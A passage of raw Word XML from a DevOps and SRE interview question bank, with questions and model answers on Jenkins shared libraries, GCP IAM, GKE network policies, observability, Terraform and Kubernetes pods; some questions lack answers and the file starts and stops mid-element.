          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q210. Scenario - Jenkins shared library: Ten pipelines duplicate the same deployment logic with slight drift between them. How would you refactor this using a Jenkins shared library?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Extract the common deployment logic into a Jenkins Shared Library repo with a vars/ directory defining a global function (e.g., vars/deployApp.groovy) that takes parameters for the things that legitimately differ between pipelines (app name, environment, image tag, deployment target), and have each of the ten Jenkinsfiles shrink down to a @Library('my-shared-lib') _ import plus a single call like deployApp(app: 'checkout', env: 'prod'). This eliminates drift by construction, and version-pinning the library lets you roll out changes to pipelines gradually rather than all-at-once.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q211. Jenkins shared library structure: How would you structure a Jenkins shared library repository using the vars/ and src/ directories, and what belongs in each?</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Jenkins shared library structure: How would you structure a Jenkins shared library repository using the vars/ and src/ directories, and what belongs in each?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q212. Jenkins shared library versioning: How would you version a Jenkins shared library and safely roll out a breaking change without breaking every pipeline that already uses it?</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Jenkins shared library versioning: How would you version a Jenkins shared library and safely roll out a breaking change without breaking every pipeline that already uses it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q213. Jenkins shared library testing: How would you unit test Jenkins shared library Groovy code before it reaches production pipelines?</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Jenkins shared library testing: How would you unit test Jenkins shared library Groovy code before it reaches production pipelines?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q214. Jenkins shared library secrets: A shared library step needs to call an internal deployment API. How would you handle credentials inside the shared library safely, without hardcoding secrets into the library code?</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Jenkins shared library secrets: A shared library step needs to call an internal deployment API. How would you handle credentials inside the shared library safely, without hardcoding secrets into the library code?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q215. Global vs @Library shared library: What is the difference between a globally trusted Jenkins shared library and one explicitly loaded with @Library('name@version') in a specific Jenkinsfile?</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Global vs @Library shared library: What is the difference between a globally trusted Jenkins shared library and one explicitly loaded with @Library('name@version') in a specific Jenkinsfile?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q216. Jenkins shared library parameters: How would you design a shared library step so different teams can pass their own parameters (e.g. image name, namespace, environment) without copy-pasting pipeline logic?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the GCP / DevOps / SRE Question Bank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Jenkins shared library parameters: How would you design a shared library step so different teams can pass their own parameters (e.g. image name, namespace, environment) without copy-pasting pipeline logic?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q217. Scenario - IAM conditional binding: Security wants a service account to have Storage Object Viewer only during business hours and only on a specific bucket. How would you implement that in IAM?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Grant roles/storage.objectViewer scoped to that specific bucket (not project-wide) using a resource-level IAM binding, and attach an IAM Condition to that binding using CEL expressions against request.time (e.g., business-hours checks in a specific timezone) so the grant is only evaluated as active within that window. It's worth flagging that IAM time conditions are evaluated at request time and aren't a hard 'revoke at 5pm' mechanism with active session termination, so pair this with monitoring/alerting on access attempts outside the window.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q218. Scenario - default-deny NetworkPolicy rollout: You need to introduce a default-deny NetworkPolicy in a shared GKE cluster with many existing teams. How would you roll it out without breaking production traffic?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Start by auditing actual traffic patterns first - using Dataplane V2's built-in flow logs/observability (or Hubble if using Cilium) to see which namespace-to-namespace and namespace-to-external flows are actually happening today, since guessing at allow rules without this data is how default-deny rollouts break production. Roll it out namespace by namespace rather than cluster-wide at once: apply the specific allow rules derived from the traffic audit alongside the default-deny in a low-traffic namespace first, verify nothing breaks, then repeat - and keep a fast rollback path ready during each rollout window, communicated to each team in advance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q219. Today interview 2026-07-06 - Python equality: What does the == operator do in Python?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: The == operator checks value equality. It asks whether two objects should be considered equal according to their type's equality implementation, usually __eq__. For example, [1, 2] == [1, 2] is True because the two lists contain equal values in the same order, even though they are different list objects. This is different from is, which checks whether two variables point to the exact same object in memory.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q220. Today interview 2026-07-06 - Environment availability: How would you manage availability across Dev, QA, and Prod environments?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Availability should match environment criticality. Prod gets multi-zone or multi-region design, autoscaling, backups, SLOs, alerting, DR drills, and strict change windows. QA should be stable enough to validate releases but can usually use reduced capacity. Dev can tolerate lower availability and scheduled shutdowns for cost. The key is not making all environments equally expensive; it is making non-prod representative enough to catch issues before prod while preserving prod-grade resilience where users depend on it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q221. Today interview 2026-07-06 - Safe promotion: How would you promote infrastructure and application changes safely between environments?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Promote the same tested artifact or module version from dev to QA to prod instead of rebuilding at each stage. Use CI checks, Terraform plan review, policy-as-code, automated tests, smoke tests, approvals, and progressive deployment. For infrastructure, pin module versions and promote version bumps through environment directories. For applications, use immutable image tags, canary or blue-green rollout, health checks, SLO gates, and clear rollback criteria.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q222. Today interview 2026-07-06 - Symptom vs cause alerts: Explain symptom-based versus cause-based alerts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Symptom-based alerts fire on user-visible impact: error rate, latency, failed transactions, unavailability, or stale data. Cause-based alerts fire on possible reasons: CPU high, Pod restart, disk pressure, certificate near expiry, queue backlog, or database lock contention. Symptom alerts are better for paging because they tell you users are affected. Cause alerts are useful for ticketing, dashboards, or diagnostics, but too many cause alerts can create noise if they do not correlate with real impact.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q223. Today interview 2026-07-06 - Noisy alerts: How do you reduce noisy alerts?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Inventory alerts, remove duplicates, map each alert to an owner, runbook, severity, and user impact, and disable alerts that are not actionable. Convert raw resource threshold pages into SLO or symptom-based alerts where possible. Tune thresholds with historical data, add for/duration windows, group related alerts, route low-severity issues to tickets, and use inhibition so one root incident does not page ten times. After incidents, review whether alerts were early, late, missing, or noisy.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q224. Today interview 2026-07-06 - Telemetry collection: What telemetry do you collect for a production Kubernetes platform?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Collect metrics, logs, traces, events, and audit signals. Metrics include golden signals, Pod/container CPU and memory, restarts, saturation, node pressure, HPA/autoscaler behavior, API server health, ingress/load balancer metrics, database and queue health. Logs should be structured with service, environment, version, request ID, trace ID, and error fields. Traces should cover critical request paths. Also collect Kubernetes events, deployment/change events, Cloud Audit Logs, security findings, and business metrics for user journeys.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q225. Today interview 2026-07-06 - Trace ID: Why should every request carry a Trace ID?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A trace ID gives one request a stable identity across many services, Pods, queues, and databases. Without it, debugging a distributed failure becomes guesswork across timestamps and partial logs. With it, you can see the full path, latency per hop, failed dependency, retries, and logs related to the same user request. It also improves incident response because engineers can move from a customer complaint to the exact backend path quickly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q226. Today interview 2026-07-06 - Structured JSON logging: Explain structured JSON logging.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Structured JSON logging means each log line is a JSON object with consistent fields instead of a free-text sentence. For example: timestamp, severity, service, environment, version, trace_id, request_id, user_id, route, status_code, latency_ms, and error_type. This makes logs searchable, aggregatable, and machine-processable in tools like Cloud Logging, Elasticsearch, Loki, or Splunk. It also helps alerting and incident analysis because you can query fields reliably instead of parsing text with brittle regexes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q227. Today interview 2026-07-06 - Terraform module separation: Design Terraform module separation for networking, IAM, GKE, databases, and observability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Separate reusable modules from environment live code. Build small modules around ownership boundaries: network/VPC/subnets/firewall/NAT, IAM/service accounts/bindings, GKE/cluster/node pools, database/Cloud SQL/AlloyDB, observability/log sinks/alerts/dashboards. Keep modules generic and versioned, with clear inputs/outputs. In live environments, compose these modules with separate state where blast radius differs. Avoid one giant module that hides risky changes or forces unrelated resources to be planned and applied together.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q228. Today interview 2026-07-06 - Distributed tracing design: Design distributed tracing for a request flowing through multiple Kubernetes services.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Instrument the ingress/API gateway and every service with OpenTelemetry. Generate or accept W3C traceparent at the edge, propagate it on HTTP/gRPC calls, and copy it into message attributes for async queues. Each service creates spans around inbound request handling, downstream calls, database queries, cache calls, and important business operations. Export spans through an OpenTelemetry Collector with consistent resource attributes like service.name, deployment.environment, version, namespace, and cluster. Use sampling carefully so errors and high-latency requests are retained.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q229. Today interview 2026-07-06 - Rollback strategy: Design a rollback strategy for application and infrastructure changes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: For applications, use immutable image versions, canary or blue-green deployment, health checks, SLO gates, and automated rollback when error rate or latency crosses thresholds. Keep database migrations backward-compatible so old and new versions can run during rollback. For infrastructure, keep versioned Terraform modules, reviewed plan files, small blast-radius states, and a documented restore path from previous state or Git commit. Always define rollback triggers, owner, command/runbook, validation checks, and communication plan before a risky change.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q230. Today interview 2026-07-06 - Feature-flag deployment: Design a feature-flag deployment strategy for production releases.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Separate deploy from release. Deploy code dark with the flag off, enable it first for internal users or a small tenant cohort, then ramp by percentage or segment while watching business and technical metrics. Flags need ownership, expiry dates, audit logs, default-safe behavior, and kill switches that work without redeploying. For critical paths, design flags to fail closed or fail to the old path, and include flag state in logs and traces so incidents can identify whether a request used the new behavior.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q231. Today interview 2026-07-06 - Customer issue scenario: Customers report production issues but dashboards are inconclusive. What do you do first?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Start by confirming and scoping impact: who is affected, what user journey, when it started, regions/tenants/versions, and error examples. Check recent changes, synthetic checks, support tickets, logs by correlation ID, ingress/load balancer metrics, dependency health, and business KPIs. If impact is real, open an incident, assign roles, communicate early, and choose a mitigation based on evidence. Do not wait for a perfect dashboard; use customer examples to drive log and trace investigation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q232. Today interview 2026-07-06 - Failing request across services: A request is failing across multiple Kubernetes services. How would you trace and debug it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Start from one failing request ID or trace ID. Follow the distributed trace to find the first failing or slow span, then inspect structured logs for that trace across services. Check ingress status codes, service endpoints, Pod readiness, Kubernetes events, recent deploys, config changes, network policies, and dependency health. If tracing is missing, reproduce with a generated correlation ID and follow logs hop by hop. Once mitigated, add instrumentation for the blind spot that slowed debugging.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q233. Today interview 2026-07-06 - Alert fatigue scenario: Alerts are noisy and engineers ignore them. How would you fix the alerting system?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Treat it as reliability debt. Export the alert list, group by owner/severity/frequency, identify top noisy alerts, and ask whether each one is actionable, customer-impacting, and tied to a runbook. Delete or downgrade non-actionable alerts, group correlated alerts, add durations, tune thresholds with historical data, and shift paging to SLO burn/user-impact alerts. Add an alert review process after every incident and a rule that every page must have an owner, runbook, and expected action.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q234. Today interview 2026-07-06 - Similar scenario AWS IAM mapping: During AWS to GCP migration, how would you map IAM roles, service accounts, and secrets safely?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Inventory IAM roles, policies, users, instance profiles, and secret usage in AWS. Map workload identities to GCP service accounts with least-privilege IAM roles, avoiding one broad shared account. Replace static keys with Workload Identity, Workload Identity Federation, or managed service identities where possible. Move secrets to Secret Manager with rotation and access logging. Validate access using test workloads and audit logs before cutover, and remove legacy AWS permissions only after GCP access is proven.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q235. Today interview 2026-07-06 - Similar scenario database cutover: How would you plan database migration and cutover from AWS RDS to Cloud SQL or AlloyDB with minimal downtime?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Assess engine/version compatibility, extensions, schema, data size, write rate, maintenance windows, and RPO/RTO. Use Database Migration Service or native replication where possible to perform initial load plus continuous replication. Run schema validation, row counts, checksums, query performance tests, backup/restore tests, and application compatibility tests. For cutover, freeze or drain writes briefly, let replication catch up, switch connection strings or traffic, validate critical transactions, and keep rollback to the original RDS path until confidence criteria are met.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q236. Today interview 2026-07-06 - Similar scenario NetworkPolicy rollout: How would you roll out default-deny Network Policies safely in an existing production cluster?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Audit actual traffic first using flow logs, service mesh telemetry, or CNI observability. Add labels consistently, create allow policies for known ingress, egress, DNS, monitoring, and dependencies, then test in dev/staging. Roll out namespace by namespace, starting with low-risk services, with owners present and a fast revert command ready. Watch error rates, DNS failures, connection refused/timeouts, and application logs. Make admission policy require future workloads to declare network intent.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q237. Today interview 2026-07-06 - Similar scenario observability maturity: How would you know whether your observability setup is actually helping incidents instead of just collecting data?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Measure outcomes, not tool count. Mature observability reduces MTTA and MTTR, detects user impact before customers report it, connects metrics/logs/traces by service and trace ID, has useful runbooks, and shows ownership. During postmortems, ask whether alerts were timely, dashboards answered the first questions, traces found the bottleneck, and logs were searchable. If engineers still jump across disconnected tools or rely on guesses, the setup is collecting data but not creating operational clarity.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q238. Today interview 2026-07-06 - Similar scenario SLO alert tuning: How would you tune SLO burn-rate alerts for both fast outages and slow reliability degradation?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use multi-window multi-burn-rate alerts. A short window with a high burn rate catches severe fast outages quickly, while a longer window with a lower burn rate catches slow degradation before the monthly budget is exhausted. Tune thresholds from historical error budget consumption and page only when both short and longer windows confirm the burn, reducing false positives. Route slower burns to tickets if they do not require immediate wake-up, but still make ownership and deadlines clear.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q239. Today interview 2026-07-06 - Similar scenario trace sampling: How would you choose trace sampling and retention for high-traffic microservices?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use head or tail sampling based on volume and debugging needs. Keep 100 percent of errors, high-latency requests, important customer journeys, and low-volume critical services. Sample normal high-volume success traffic at a lower rate to control cost. Retain detailed traces long enough for incident investigation and keep aggregated metrics longer. Document sampling rules so engineers understand why some normal requests may not have traces, and avoid dropping the exact traces needed for incidents.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Kubernetes Fundamentals (101–200)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q240. How Request Flows</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 1. User sends deployment YAML using kubectl.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      2. API Server receives request.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      3. etcd stores cluster state.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      4. Scheduler selects suitable node.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      5. Kubelet creates Pods on worker node.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      6. Container runtime starts containers.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      7. Kube Proxy enables networking and load balancing.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview Answer (7 Years Experience)</w:t>
        <w:br/>
        <w:t>Kubernetes architecture is divided into Control Plane and Worker Nodes. The Control Plane manages scheduling, orchestration, cluster state, and APIs through components like API Server, Scheduler, Controller Manager, and etcd. Worker Nodes run application workloads using Kubelet, Container Runtime, and Kube Proxy. When a deployment is submitted, the API Server processes it, Scheduler assigns Pods to nodes, and Kubelet ensures containers are running as desired. The architecture provides scalability, self-healing, load balancing, and automated orchestration for containerized applications.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q241. What is a pod?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A Pod is the smallest deployable unit in Kubernetes.</w:t>
        <w:br/>
        <w:t>It is a wrapper around one or more containers that share:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Same network</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Same IP address</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Same storage volumes</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Same lifecycle</w:t>
        <w:br/>
        <w:t>Usually, a Pod contains a single container, but multiple tightly coupled containers can also run inside one Pod.</w:t>
        <w:br/>
        <w:t>Key Characteristics</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Runs on a worker node</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Ephemeral in nature</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Gets recreated if deleted or failed</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Managed by Deployments, ReplicaSets, or StatefulSets</w:t>
        <w:br/>
        <w:t>Example</w:t>
        <w:br/>
        <w:t>A Pod may contain:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Main application container</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Sidecar container for logging/monitoring</w:t>
        <w:br/>
        <w:t>Both containers communicate using localhost because they share the same network namespace.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Lifecycle of a Pod</w:t>
        <w:br/>
        <w:t>Pending → Running → Succeeded/Failed</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Common Pod Commands</w:t>
        <w:br/>
        <w:t>kubectl get pods</w:t>
        <w:br/>
        <w:t>kubectl describe pod &lt;pod-name&gt;</w:t>
        <w:br/>
        <w:t>kubectl logs &lt;pod-name&gt;</w:t>
        <w:br/>
        <w:t>kubectl delete pod &lt;pod-name&gt;</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple Interview Answer (7 Years Experience)</w:t>
        <w:br/>
        <w:t>A Pod is the smallest deployable object in Kubernetes that encapsulates one or more containers along with shared networking and storage. Pods run on worker nodes and are managed by higher-level controllers like Deployments or StatefulSets. Containers inside the same Pod communicate using localhost and share the same lifecycle.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
